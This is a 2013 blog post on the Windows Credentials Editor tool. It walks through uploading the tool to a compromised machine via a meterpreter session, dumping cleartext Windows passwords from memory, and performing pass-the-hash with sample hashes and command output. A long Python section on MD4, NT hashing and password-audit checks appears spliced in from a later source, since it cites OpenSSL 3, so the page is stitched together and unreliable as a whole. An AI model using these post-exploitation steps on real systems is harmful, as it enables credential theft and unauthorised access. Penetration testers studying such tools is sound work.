Saturday, February 9, 2013

How to get Windows passwords in plain text?


Windows Credentials Editor (WCE) is a security tool that allows you to list Windows logon sessions and add, change, list and delete the credentials associated with them (e.g. LM/NT hashes, Kerberos tickets and cleartext passwords).

The tool allows users to:
  • Perform Pass-the-Hash on Windows
  • 'Steal' NTLM credentials from memory (with and without code injection)
  • 'Steal' Kerberos Tickets from Windows machines
  • Use the 'stolen' kerberos Tickets on other Windows or Unix machines to gain access to systems and services
  • Dump cleartext passwords stored by Windows authentication packages
WCE is a security tool widely used by security professionals to assess the security of Windows networks during penetration tests.
After compromising the remote computer, upload WCE to it using Metasploit:
(1) Type the following command in the meterpreter session:
upload /pentest/passwords/wce/wce.exe .
(2) Now type shell to get a cmd prompt on the victim PC.
(3) Type wce.exe -w to get the passwords in clear text.


How to list NTLM credentials in memory?


By default, WCE lists NTLM credentials in memory, no need to specify any options.
For example:
C:\Users\test>wce.exe

How to change my current NTLM credentials?


wce.exe -s <username>:<domain>:<lmhash>:<nthash>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
Changing NTLM credentials of current logon session (00024E1Bh) to:
Username: testuser
domain: amplialabs
LMHash: 01FC5A6BE7BC6929AAD3B435B51404EE
NTHash: 0CB6948805F797BF2A82807973B89537
NTLM credentials successfully changed!



How to create a new logon session and launch a program with new NTLM credentials?

wce.exe -s <username>:<domain>:<lmhash>:<nthash> -c <program>
For example:
C:\Users\test>wce.exe -s testuser:amplialabs:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537 -c cmd.exe


How to generate NTLM hashes with WCE?

wce.exe -g <cleartext password>
For example:
C:\Users\test>wce.exe -g mypassword
WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com)
Use -h for help.
Password: mypassword
Hashes: 74AC99CA40DED420DC1A73E6CEA67EC5:A991AE45AA987A1A48C8BDC1209FF0E7 
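As an added illustration of what the -g option computes (example code written for this page, not part of WCE or any Amplia Security release): the NT hash is the MD4 digest of the password encoded as UTF-16LE, and the LM hash is built with DES over the upper-cased password padded to 14 bytes, two 7-byte halves hashed separately. That is why the LM hash of a password of seven characters or fewer ends in the fixed block AAD3B435B51404EE, as in the -s example above, and why an all-empty LM hash means LM storage is off or the password is longer than 14 characters. The block below implements MD4 in pure Python (hashlib's md4 is absent on OpenSSL 3 builds without the legacy provider), derives the NT hash, classifies an LM hash for an audit, and checks an NT hash against a constructed deny-list the way a password-policy audit would. DES is not reproduced, so the LM hash itself is not computed here.

```python
import struct

_MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """Return the 16-byte MD4 digest of data (RFC 1320)."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    # Padding: a 0x80 byte, zeros up to 56 mod 64, then the 64-bit LE bit length.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)

    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (g, 0x5A827999, (3, 5, 9, 13), (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (h, 0x6ED9EBA1, (3, 9, 11, 15), (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = list(state)
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                # The registers rotate every step: (A,B,C,D), (D,A,B,C), (C,D,A,B), (B,C,D,A).
                a, b, c, d = ((j - i) % 4 for j in range(4))
                r[a] = _rotl((r[a] + fn(r[b], r[c], r[d]) + x[k] + const) & _MASK, shifts[i % 4])
        state = [(s + v) & _MASK for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash as WCE prints it: MD4 over the UTF-16LE password, upper-case hex."""
    return md4(password.encode("utf-16-le")).hex().upper()


# DES("KGS!@#$%") under an all-zero 7-byte key: the LM hash of an empty half.
EMPTY_LM_HALF = "AAD3B435B51404EE"


def lm_hash_class(lm_hex: str) -> str:
    """Classify a 32-hex-char LM hash for an audit report.

    'absent' : both halves empty, LM hashing disabled or password > 14 chars
    'short'  : second half empty, LM hashing enabled and password <= 7 chars
    'full'   : both halves populated, LM hashing enabled
    """
    lm_hex = lm_hex.strip().upper()
    if len(lm_hex) != 32 or any(ch not in "0123456789ABCDEF" for ch in lm_hex):
        raise ValueError("LM hash must be 32 hexadecimal characters")
    first, second = lm_hex[:16], lm_hex[16:]
    if first == EMPTY_LM_HALF and second == EMPTY_LM_HALF:
        return "absent"
    if second == EMPTY_LM_HALF:
        return "short"
    return "full"


def denylisted_match(nt_hex: str, candidates) -> str:
    """Return the deny-listed plaintext whose NT hash equals nt_hex, or '' if none.

    This is the audit direction: hash each banned password and compare, so the
    stored hash never needs to be reversed.
    """
    target = nt_hex.strip().upper()
    for word in candidates:
        if nt_hash(word) == target:
            return word
    return ""


if __name__ == "__main__":
    # Constructed sample inputs for a stand-alone run.
    print("NT hash of 'mypassword':", nt_hash("mypassword"))  # compare with the NTHash half of WCE's output above
    print("LM class of the -s example:", lm_hash_class("01FC5A6BE7BC6929AAD3B435B51404EE"))
    print("Deny-list hit:", denylisted_match("8846F7EAEE8FB117AD06BDD830B7586C", ["letmein", "password"]))
```

The MD4 routine is checked against the RFC 1320 test vectors, and nt_hash("password") must come out as 8846F7EAEE8FB117AD06BDD830B7586C, the widely published NT hash of that string; if either differs, the implementation is wrong, not the page. The lm_hash_class result for the -s example on this page is "short", which tells an auditor that the account's password is at most seven characters and that LM hash storage is still enabled.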

If you want to know more about how it works, download the PDF files below.
(1) PDF 1
(2) PDF 2

If you only need clear text passwords, and not logon sessions or anything else,
you can use mimikatz to get the clear text passwords.


2 comments:

Unknown said...

Amazing, but I want to know more!!!

nirav desai said...

Thank you, you can download the PDF files which are listed at the end of the article. @Sanju kutty
